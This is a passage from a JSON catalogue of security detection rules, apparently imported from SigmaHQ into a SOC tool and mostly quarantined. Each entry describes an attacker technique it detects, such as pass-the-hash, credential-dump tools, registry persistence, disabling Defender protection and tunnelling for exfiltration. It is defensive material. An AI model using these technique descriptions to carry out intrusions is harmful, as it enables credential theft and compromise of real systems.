"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_guest_to_member.yml" } }, { "id": "sigmahq-sigma-8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "type": "detection", "name": "Potentially Suspicious CMD Shell Output Redirect", "description": "Detects inline Windows shell commands redirecting output via the \">\" symbol to a suspicious location.\nThis technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as \"hostname\" and \"dir\" to files for future exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-cmd-shell-output-redirect.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml" } }, { "id": "sigmahq-sigma-8e1cb247-6cf6-42fa-b440-3f27d57e9936", "type": "detection", "name": "Potential Persistence Via Microsoft Office Add-In", "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit 
for Word or Excel).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-microsoft-office-add-in.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_addin_persistence.yml" } }, { "id": "sigmahq-sigma-8e3c7994-131e-4ba5-b6ea-804d49113a26", "type": "detection", "name": "Uncommon Child Process Spawned By Odbcconf.EXE", "description": "Detects an uncommon child process of \"odbcconf.exe\" binary which normally shouldn't have any child processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-spawned-by-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8e3c7994-131e-4ba5-b6ea-804d49113a26", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml" } }, { "id": 
"sigmahq-sigma-8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "type": "detection", "name": "Tap Driver Installation", "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tap-driver-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml" } }, { "id": "sigmahq-sigma-8e5c03fa-b7f0-11ea-b242-07e0576828d9", "type": "detection", "name": "Denied Access To Remote Desktop", "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/denied-access-to-remote-desktop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"8e5c03fa-b7f0-11ea-b242-07e0576828d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" } }, { "id": "sigmahq-sigma-8e95e73e-ba02-4a87-b4d7-0929b8053038", "type": "detection", "name": "Suspicious ArcSOC.exe Child Process", "description": "Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe.\nArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromises an ArcGIS\nServer system and uploads a malicious Server Object Extension (SOE), they can send crafted requests to the corresponding\nservice endpoint and remotely execute code from the ArcSOC.exe process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-arcsoc-exe-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8e95e73e-ba02-4a87-b4d7-0929b8053038", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_arcsoc_susp_child_process.yml" } }, { "id": "sigmahq-sigma-8ec2c8b4-557a-4121-b87c-5dfb3a602fae", "type": "detection", "name": "JexBoss Command Sequence", "description": "Detects suspicious command sequence that JexBoss", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ 
"T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jexboss-command-sequence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_susp_jexboss.yml" } }, { "id": "sigmahq-sigma-8eef149c-bd26-49f2-9e5a-9b00e3af499b", "type": "detection", "name": "Pass the Hash Activity 2", "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1550.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/pass-the-hash-activity-2.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml" } }, { "id": "sigmahq-sigma-8f02c935-effe-45b3-8fc9-ef8696a9e41d", "type": "detection", "name": "Non-privileged Usage of Reg or Powershell", "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/non-privileged-usage-of-reg-or-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml" } }, { "id": "sigmahq-sigma-8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", "type": "detection", "name": "Unusual File Deletion by Dns.exe", "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unusual-file-deletion-by-dns-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" } }, { "id": "sigmahq-sigma-8f2a5c3d-9e4b-4a7c-8d1f-2e5a6b9c3d7e", "type": "detection", "name": "Suspicious Space Characters in TypedPaths Registry Path - FileFix", "description": "Detects the occurrence of numerous space 
characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.004", "T1027.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-space-characters-in-typedpaths-registry-path-filefix.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f2a5c3d-9e4b-4a7c-8d1f-2e5a6b9c3d7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_typedpaths_space_characters.yml" } }, { "id": "sigmahq-sigma-8f3ab69a-aa22-4943-aa58-e0a52fdf6818", "type": "detection", "name": "User Shell Folders Registry Modification via CommandLine", "description": "Detects modifications to User Shell Folders registry values via reg.exe or PowerShell, which could indicate persistence attempts.\nAttackers may modify User Shell Folders registry values to point to malicious executables or scripts that will be executed during startup.\nThis technique is often used to maintain persistence on a compromised system by ensuring that malicious payloads are executed automatically.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-shell-folders-registry-modification-via-commandline.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f3ab69a-aa22-4943-aa58-e0a52fdf6818", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification.yml" } }, { "id": "sigmahq-sigma-8f668cc4-c18e-45fe-ad00-624a981cf88a", "type": "detection", "name": "Okta Application Sign-On Policy Modified or Deleted", "description": "Detects when an application Sign-on Policy is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-application-sign-on-policy-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f668cc4-c18e-45fe-ad00-624a981cf88a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_application_sign_on_policy_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "type": "detection", "name": "Java Running with Remote Debugging", "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203" ], "log_source": null, "playbook": null, "verified": false, "source": 
"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/java-running-with-remote-debugging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_remote_debugging.yml" } }, { "id": "sigmahq-sigma-8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "type": "detection", "name": "Potential Persistence Via MyComputer Registry Keys", "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-mycomputer-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" } }, { "id": "sigmahq-sigma-8fbf3271-1ef6-4e94-8210-03c2317947f6", "type": "detection", "name": "Cred Dump Tools Dropped Files", "description": "Files with well-known filenames (parts of credential dump software or 
files produced by them) creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1003.002", "T1003.003", "T1003.004", "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cred-dump-tools-dropped-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" } }, { "id": "sigmahq-sigma-8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "type": "detection", "name": "Suspicious PowerShell Invocations - Specific - PowerShell Module", "description": "Detects suspicious PowerShell invocation command parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-invocations-specific-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml" } }, { "id": 
"sigmahq-sigma-8ffc5407-52e3-478f-9596-0a7371eafe13", "type": "detection", "name": "Disable PUA Protection on Windows Defender", "description": "Detects disabling Windows Defender PUA protection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-pua-protection-on-windows-defender.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml" } }, { "id": "sigmahq-sigma-90217a70-13fc-48e4-b3db-0d836c5824ac", "type": "detection", "name": "GAC DLL Loaded Via Office Applications", "description": "Detects any GAC DLL being loaded by an Office Product", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/gac-dll-loaded-via-office-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90217a70-13fc-48e4-b3db-0d836c5824ac", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/image_load/image_load_office_dotnet_gac_dll_load.yml" } }, { "id": "sigmahq-sigma-902cedee-0398-4e3a-8183-6f3a89773a96", "type": "detection", "name": "Suspicious Invoke-Item From Mount-DiskImage", "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-invoke-item-from-mount-diskimage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "902cedee-0398-4e3a-8183-6f3a89773a96", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" } }, { "id": "sigmahq-sigma-903076ff-f442-475a-b667-4f246bcc203b", "type": "detection", "name": "Nltest.EXE Execution", "description": "Detects nltest commands that can be used for information discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1016", "T1018", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nltest-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "903076ff-f442-475a-b667-4f246bcc203b", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_nltest_execution.yml" } }, { "id": "sigmahq-sigma-904e8e61-8edf-4350-b59c-b905fc8e810c", "type": "detection", "name": "Security Software Discovery Via Powershell Script", "description": "Detects calls to \"get-process\" where the output is piped to a \"where-object\" filter to search for security solution processes.\nAdversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-software-discovery-via-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "904e8e61-8edf-4350-b59c-b905fc8e810c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml" } }, { "id": "sigmahq-sigma-9058ca8b-f397-4fd1-a9fa-2b7aad4d6309", "type": "detection", "name": "Okta Admin Functions Access Through Proxy", "description": "Detects access to Okta admin functions through proxy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-admin-functions-access-through-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9058ca8b-f397-4fd1-a9fa-2b7aad4d6309", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_admin_activity_from_proxy_query.yml" } }, { "id": "sigmahq-sigma-905d389b-b853-46d0-9d3d-dea0d3a3cd49", "type": "detection", "name": "AWS STS AssumeRole Misuse", "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1550", "T1550.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-sts-assumerole-misuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_sts_assumerole_misuse.yml" } }, { "id": "sigmahq-sigma-9069ea3c-b213-4c52-be13-86506a227ab1", "type": "detection", "name": "Linux Crypto Mining Indicators", "description": "Detects command line parameters or strings often used by crypto miners", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
"mitre_techniques": [ "T1496" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-crypto-mining-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9069ea3c-b213-4c52-be13-86506a227ab1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" } }, { "id": "sigmahq-sigma-9082ff1f-88ab-4678-a3cc-5bcff99fc74d", "type": "detection", "name": "HackTool - GMER Rootkit Detector and Remover Execution", "description": "Detects the execution of the GMER tool based on image and hash fields.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-gmer-rootkit-detector-and-remover-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_gmer.yml" } }, { "id": "sigmahq-sigma-908655e0-25cf-4ae1-b775-1c8ce9cf43d8", "type": "detection", "name": "Login to Disabled Account", "description": "Detects failed attempts to sign in to disabled accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/login-to-disabled-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_login_to_disabled_account.yml" } }, { "id": "sigmahq-sigma-90ae0469-0cee-4509-b67f-e5efcef040f7", "type": "detection", "name": "Aruba Network Service Potential DLL Sideloading", "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aruba-network-service-potential-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90ae0469-0cee-4509-b67f-e5efcef040f7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml" } }, { "id": "sigmahq-sigma-90d50722-0483-4065-8e35-57efaadd354d", "type": "detection", "name": "Arbitrary MSI Download Via Devinit.EXE", 
"description": "Detects a certain command line flag combination used by \"devinit.exe\", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-msi-download-via-devinit-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "90d50722-0483-4065-8e35-57efaadd354d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml" } }, { "id": "sigmahq-sigma-90d6bd71-dffb-4989-8d86-a827fedd6624", "type": "detection", "name": "Visual Studio Code Tunnel Execution", "description": "Detects Visual Studio Code tunnel execution. 
